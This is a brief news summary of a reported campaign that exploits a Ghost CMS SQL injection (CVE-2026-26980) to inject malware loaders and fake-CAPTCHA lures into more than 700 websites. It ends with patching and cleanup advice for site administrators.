Overview
- QiAnXin XLab reported on May 25 that researchers had identified a large campaign that has compromised more than 700 sites across universities, AI and SaaS firms, media outlets, fintech firms, and independent blogs.
- The root bug is CVE-2026-26980, an SQL injection affecting Ghost 3.24.0 through 6.19.0 that lets unauthenticated actors read database data including admin API keys; Ghost issued a fix in version 6.19.1 on February 19 and many sites remain unpatched.
- Attackers exploit the SQL injection to steal a site’s Admin API key and then use the Ghost Admin API to insert a tiny JavaScript loader into published pages.
- That loader contacts a second-stage PHP cloaker hosted at clo4shara[.]xyz, which uses the commercial Adspect service to fingerprint visitors and serve a fake CAPTCHA iframe that instructs victims to paste a Base64 command into Windows Run to drop malware.
- Observed payloads include DLL loaders, JavaScript droppers, and an Electron installer, and researchers warn administrators to upgrade Ghost, rotate exposed API keys, remove injected scripts using published IoCs, keep admin API logs for investigation, and watch for rapid re-infection from at least two competing attacker clusters.